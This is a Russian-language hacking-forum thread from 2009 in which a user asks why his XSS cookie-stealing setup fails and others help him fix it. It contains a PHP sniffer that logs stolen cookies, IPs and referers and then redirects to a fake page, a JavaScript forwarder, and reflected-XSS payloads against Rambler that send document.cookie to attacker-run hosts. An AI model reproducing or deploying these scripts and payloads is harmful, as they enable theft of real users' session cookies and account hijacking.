Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Отправка cookies на сниффер? |
22.11.2009, 00:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Отправка cookies на сниффер?
Доброго времени суток. Прошу помочь советом? Я использую браузер Mozilla Firefox. Так вот проблема в том что я не могу отправить куки на сниффер. Начну попорядку.
1. У меня есть свой хост с поддержкой PHP но без поддержки .htaccess. Это: http://www.wallst.ru. На него я залил свой скрипт. Вот исходный код:
<?php
$log="log.txt";
$file=fopen($log,"a+");
$RZ="_";
$Date=date("d:m:Y");
$Time=date("H:i");
$IP=$_SERVER['REMOTE_ADDR'];
$QS=$_SERVER['QUERY_STRING'];
fputs($file,$Date.$RZ.$Time.$RZ.$IP.$RZ.$QS."\n");
fclose($file);
?>
Скрипт в формате php так как htaccess не поддерживается. Права на файл сниффера и на текстовый файл log.txt я выставил 777.
2. Захотел проверить работу сниффера... Нашел пассивную XSS уязвимость в Рамблер.ру. Пишу запрос в строку браузера на вывод моих cookies через функцию alert().
http://........./.........?="><script>alert(document .cookie)</script>. Выводятся мои плюшки...  . Все нормульки. Но если написать запрос на отправку кук на мой сниффер, то на него абсолютно ничего не приходит, запрос пишу вод так:
http://........./.........?=<script>img = new Image(); img.src ="http://sniffer.ru/sniffer.php?"+document.cookie;</script>
Тоесть я предпологаю что все что находится после "?"
будет отправлено в QUERY_STRING(так должно быть).
Пробывал и так:
http://........./.........?=<script>document.location.replace('http :sniffer.ru
sniffer.php?'+document.cookie);</script>, тоже ничего.
Огромная просьба исравить что не так. Может код сниффера, может запрос, я не могу понять, уже всю голову изломал. Удалил нафиг фаервол, антивирь, все что связано с защитой, пробовал реалезовать в Опере тоже самое. Прозьба дать дельный совет...
Последний раз редактировалось Umnick; 22.11.2009 в 00:46..
|
|
|
|
22.11.2009, 01:25
|
|
Познающий
Регистрация: 07.01.2009
Сообщений: 67
Провел на форуме:
913894
Репутация:
33
|
|
Вобще валлст хоть русский,но не советую его
Попробуй на freehostia.com
|
|
|
22.11.2009, 01:28
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155
Репутация:
719
|
|
я пользовался таким сниффером.
три файла
log.php
содержимое
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING"));
$Date = date("d-m-y H:i:s", time());
$browser = getenv("HTTP_USER_AGENT");
$ref = getenv("HTTP_REFERER");
$ip = getenv("REMOTE_ADDR");
$text = "
$Cookies:
$Date:
$browser:
$ref:
$ip:";
$filelog = fopen("base.php","a+");
fwrite($filelog,"\n $text \n");
fclose($filelog);
header('Location: http://www.адреc_фейка.ru');
?>
js.js
содержимое
PHP код:
var concat = function()
{
var args = Array.prototype.slice.call(arguments);
return args.join("");
}
a = "/log.php?";
b = document.cookie;
location.href = concat(a, b);
base.php - файл базы
Вставка сниффера
http://........./.........?"><script src="http://sniffer.ru/js.js"></script>
Последний раз редактировалось satana-fu; 22.11.2009 в 01:30..
|
|
|
|
22.11.2009, 09:13
|
|
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
Провел на форуме:
3281634
Репутация:
485
|
|
Не парся,и юзай online-sniffer.ru
|
|
|
|
22.11.2009, 11:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
satana-fu, попробую использовать такой... но не думаю что беда в снифаке, я немогу понять почему они не отправляются..
Батхед - мне бы беспланый хостинг с php и htaccess, но я думая что такового не существует в сущности.... .
попробывал он-лайн сниффер.
даю такой запрос но ничего не приходит......  (
http://rambler.ru?c=<script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>.
Почему? Как через Оперу так и через Мозиллу....... Помогите?... |
|
|
|
22.11.2009, 13:16
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155
Репутация:
719
|
|
скинь в личку ссыль с ксс, попробую разобраться
|
|
|
|
22.11.2009, 15:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Главное время запроса и ip с рефером на на мой личный сниффер приходят вод так:
22:11:2009_14:37_а.й.п.и_....(айпи скрыл), а вот куки нет.....
Подскажите в чем трабла, плиз..
|
|
|
|
22.11.2009, 16:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
satana-fu, с твои скриптом хоть что-то стало работать, теперь куки выводятся мне в адресную строку браузера, что делать?
|
|
|
|
22.11.2009, 16:15
|
|
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
Провел на форуме:
3281634
Репутация:
485
|
|
даю такой запрос но ничего не приходит......(
http://rambler.ru?c=<script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>.
тогда уж делай так чтоле http://rambler.ru?"><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>
|
|
|
|
22.11.2009, 17:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
ReduKToR, ни так ни так, не катит....
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
